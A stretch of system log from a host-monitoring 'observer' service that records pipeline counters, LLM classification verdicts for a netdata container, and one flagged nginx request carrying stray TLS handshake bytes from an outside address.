Mar 20 11:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:33:01.957751 [observer] Pipeline: processed=4639 pattern_hits=4536 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:33:01.957786 [observer] Patterns: hash=4536 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:33:31.951245 [observer] Pipeline: processed=4641 pattern_hits=4538 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:33:31.951274 [observer] Patterns: hash=4538 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:34:01.942026 [observer] Pipeline: processed=4645 pattern_hits=4542 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:34:01.942061 [observer] Patterns: hash=4542 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:34:31.935911 [observer] Pipeline: processed=4649 pattern_hits=4546 llm_calls=103 llm_errors=1 learned=3
Mar 20 11:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:34:31.935934 [observer] Patterns: hash=4546 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=103
Mar 20 11:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:01.952815 [observer] Pipeline: processed=4654 pattern_hits=4550 llm_calls=104 llm_errors=1 learned=3
Mar 20 11:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:01.952853 [observer] Patterns: hash=4550 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=104
Mar 20 11:35:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:06.242478 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 11:35:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:06.242525 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 11:35:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:14.654212 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 11:35:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:14.654257 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-netdata-container" — skipping pattern
Mar 20 11:35:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:21.035203 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.68 action=allow pattern_type=prefix
Mar 20 11:35:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:21.035244 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 11:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:31.943555 [observer] Pipeline: processed=4658 pattern_hits=4552 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:35:31.943579 [observer] Patterns: hash=4552 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:36:01.940561 [observer] Pipeline: processed=4661 pattern_hits=4555 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:36:01.940592 [observer] Patterns: hash=4555 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:36:31.939959 [observer] Pipeline: processed=4664 pattern_hits=4558 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:36:31.939986 [observer] Patterns: hash=4558 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:37:01.956929 [observer] Pipeline: processed=4666 pattern_hits=4560 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:37:01.956970 [observer] Patterns: hash=4560 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:37:31.934557 [observer] Pipeline: processed=4670 pattern_hits=4564 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:37:31.934581 [observer] Patterns: hash=4564 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:38:01.977665 [observer] Pipeline: processed=4672 pattern_hits=4566 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:38:01.977691 [observer] Patterns: hash=4566 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:38:31.935794 [observer] Pipeline: processed=4676 pattern_hits=4570 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:38:31.935824 [observer] Patterns: hash=4570 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:39:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:39:02.042924 [observer] Pipeline: processed=4678 pattern_hits=4572 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:39:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:39:02.043150 [observer] Patterns: hash=4572 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:39:31.934238 [observer] Pipeline: processed=4681 pattern_hits=4575 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:39:31.934263 [observer] Patterns: hash=4575 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:40:01.938525 [observer] Pipeline: processed=4686 pattern_hits=4580 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:40:01.938551 [observer] Patterns: hash=4580 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:40:31.950385 [observer] Pipeline: processed=4688 pattern_hits=4582 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:40:31.950417 [observer] Patterns: hash=4582 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:41:01.937546 [observer] Pipeline: processed=4692 pattern_hits=4586 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:41:01.937573 [observer] Patterns: hash=4586 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:41:31.943695 [observer] Pipeline: processed=4694 pattern_hits=4588 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:41:31.943733 [observer] Patterns: hash=4588 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:42:01.942048 [observer] Pipeline: processed=4698 pattern_hits=4592 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:42:01.942084 [observer] Patterns: hash=4592 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:42:31.935614 [observer] Pipeline: processed=4700 pattern_hits=4594 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:42:31.935651 [observer] Patterns: hash=4594 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:43:01.967372 [observer] Pipeline: processed=4703 pattern_hits=4597 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:43:01.967407 [observer] Patterns: hash=4597 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:43:31.934288 [observer] Pipeline: processed=4706 pattern_hits=4600 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:43:31.934310 [observer] Patterns: hash=4600 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:44:01.976126 [observer] Pipeline: processed=4708 pattern_hits=4602 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:44:01.976155 [observer] Patterns: hash=4602 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:44:31.935253 [observer] Pipeline: processed=4712 pattern_hits=4606 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:44:31.935285 [observer] Patterns: hash=4606 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:45:01.937493 [observer] Pipeline: processed=4716 pattern_hits=4610 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:45:01.937519 [observer] Patterns: hash=4610 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:45:31.935475 [observer] Pipeline: processed=4720 pattern_hits=4614 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:45:31.935505 [observer] Patterns: hash=4614 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:46:02.011188 [observer] Pipeline: processed=4722 pattern_hits=4616 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:46:02.011226 [observer] Patterns: hash=4616 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:46:31.935565 [observer] Pipeline: processed=4725 pattern_hits=4619 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:46:31.935592 [observer] Patterns: hash=4619 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:47:01.943684 [observer] Pipeline: processed=4729 pattern_hits=4623 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:47:01.943710 [observer] Patterns: hash=4623 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:47:31.950933 [observer] Pipeline: processed=4731 pattern_hits=4625 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:47:31.950969 [observer] Patterns: hash=4625 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:48:01.945672 [observer] Pipeline: processed=4735 pattern_hits=4629 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:48:01.945704 [observer] Patterns: hash=4629 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:48:31.946355 [observer] Pipeline: processed=4737 pattern_hits=4631 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:48:31.946377 [observer] Patterns: hash=4631 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:49:01.960012 [observer] Pipeline: processed=4741 pattern_hits=4635 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:49:01.960043 [observer] Patterns: hash=4635 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:49:31.943791 [observer] Pipeline: processed=4743 pattern_hits=4637 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:49:31.943819 [observer] Patterns: hash=4637 prefix=0 regex=0 contains=0 deny=21 alert=302 suppress=0 misses=106
Mar 20 11:49:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:49:45.831319 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T11:49:45.831024187Z 93.174.93.12 - - [20/Mar/2026:11:49:45 +0000] "_" "\x16\x03\x02\x01o\x01\x00\x01k\x03\x02RH\xC5\x1A#\xF7:N\xDF\xE2\xB4\x82/\xFF\x09T\x9F\xA7\xC4y\xB0h\xC6\x13\x8C\xA4\x1...
Mar 20 11:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:50:01.944579 [observer] Pipeline: processed=4749 pattern_hits=4643 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:50:01.944610 [observer] Patterns: hash=4643 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:50:31.935317 [observer] Pipeline: processed=4752 pattern_hits=4646 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:50:31.935340 [observer] Patterns: hash=4646 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:51:01.985127 [observer] Pipeline: processed=4754 pattern_hits=4648 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:51:01.985258 [observer] Patterns: hash=4648 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:51:31.937685 [observer] Pipeline: processed=4758 pattern_hits=4652 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:51:31.937714 [observer] Patterns: hash=4652 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:52:01.960088 [observer] Pipeline: processed=4760 pattern_hits=4654 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:52:01.960197 [observer] Patterns: hash=4654 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:52:31.934279 [observer] Pipeline: processed=4764 pattern_hits=4658 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:52:31.934303 [observer] Patterns: hash=4658 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:53:01.956932 [observer] Pipeline: processed=4766 pattern_hits=4660 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:53:01.956966 [observer] Patterns: hash=4660 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:53:31.937751 [observer] Pipeline: processed=4769 pattern_hits=4663 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:53:31.937782 [observer] Patterns: hash=4663 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:54:01.941736 [observer] Pipeline: processed=4772 pattern_hits=4666 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:54:01.941764 [observer] Patterns: hash=4666 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:54:31.947770 [observer] Pipeline: processed=4774 pattern_hits=4668 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:54:31.947798 [observer] Patterns: hash=4668 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:55:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:55:02.008017 [observer] Pipeline: processed=4780 pattern_hits=4674 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:55:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:55:02.012593 [observer] Patterns: hash=4674 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:55:31.934345 [observer] Pipeline: processed=4782 pattern_hits=4676 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:55:31.934369 [observer] Patterns: hash=4676 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:56:01.969842 [observer] Pipeline: processed=4786 pattern_hits=4680 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:56:01.969868 [observer] Patterns: hash=4680 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:56:31.945065 [observer] Pipeline: processed=4788 pattern_hits=4682 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:56:31.945096 [observer] Patterns: hash=4682 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:57:01.959833 [observer] Pipeline: processed=4790 pattern_hits=4684 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:57:01.959875 [observer] Patterns: hash=4684 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:57:31.934111 [observer] Pipeline: processed=4794 pattern_hits=4688 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:57:31.934137 [observer] Patterns: hash=4688 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:58:01.958641 [observer] Pipeline: processed=4796 pattern_hits=4690 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:58:01.958671 [observer] Patterns: hash=4690 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:58:31.941022 [observer] Pipeline: processed=4800 pattern_hits=4694 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:58:31.941055 [observer] Patterns: hash=4694 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:59:01.948577 [observer] Pipeline: processed=4802 pattern_hits=4696 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:59:01.948604 [observer] Patterns: hash=4696 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 11:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:59:31.935464 [observer] Pipeline: processed=4806 pattern_hits=4700 llm_calls=106 llm_errors=1 learned=3
Mar 20 11:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 11:59:31.935489 [observer] Patterns: hash=4700 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:00:01.952406 [observer] Pipeline: processed=4810 pattern_hits=4704 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:00:01.952446 [observer] Patterns: hash=4704 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:00:31.950483 [observer] Pipeline: processed=4812 pattern_hits=4706 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:00:31.950511 [observer] Patterns: hash=4706 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:01:01.951829 [observer] Pipeline: processed=4816 pattern_hits=4710 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:01:01.951858 [observer] Patterns: hash=4710 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:01:31.949338 [observer] Pipeline: processed=4818 pattern_hits=4712 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:01:31.949361 [observer] Patterns: hash=4712 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:02:01.949598 [observer] Pipeline: processed=4822 pattern_hits=4716 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:02:01.949629 [observer] Patterns: hash=4716 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:02:31.934298 [observer] Pipeline: processed=4824 pattern_hits=4718 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:02:31.934320 [observer] Patterns: hash=4718 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:03:01.957189 [observer] Pipeline: processed=4828 pattern_hits=4722 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:03:01.957229 [observer] Patterns: hash=4722 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:03:31.940782 [observer] Pipeline: processed=4830 pattern_hits=4724 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:03:31.940829 [observer] Patterns: hash=4724 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:04:01.952220 [observer] Pipeline: processed=4832 pattern_hits=4726 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:04:01.953435 [observer] Patterns: hash=4726 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:04:31.941660 [observer] Pipeline: processed=4836 pattern_hits=4730 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:04:31.941695 [observer] Patterns: hash=4730 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:05:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:05:02.091763 [observer] Pipeline: processed=4838 pattern_hits=4732 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:05:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:05:02.108828 [observer] Patterns: hash=4732 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:05:31.936450 [observer] Pipeline: processed=4845 pattern_hits=4739 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:05:31.936474 [observer] Patterns: hash=4739 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:06:01.950847 [observer] Pipeline: processed=4847 pattern_hits=4741 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:06:01.950879 [observer] Patterns: hash=4741 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:06:31.934221 [observer] Pipeline: processed=4851 pattern_hits=4745 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:06:31.934242 [observer] Patterns: hash=4745 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:07:01.970531 [observer] Pipeline: processed=4853 pattern_hits=4747 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:07:01.970574 [observer] Patterns: hash=4747 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:07:31.943833 [observer] Pipeline: processed=4855 pattern_hits=4749 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:07:31.943859 [observer] Patterns: hash=4749 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:08:01.949767 [observer] Pipeline: processed=4859 pattern_hits=4753 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:08:01.949807 [observer] Patterns: hash=4753 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
Mar 20 12:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:08:31.950968 [observer] Pipeline: processed=4861 pattern_hits=4755 llm_calls=106 llm_errors=1 learned=3
Mar 20 12:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:08:31.950995 [observer] Patterns: hash=4755 prefix=0 regex=0 contains=0 deny=21 alert=303 suppress=0 misses=106
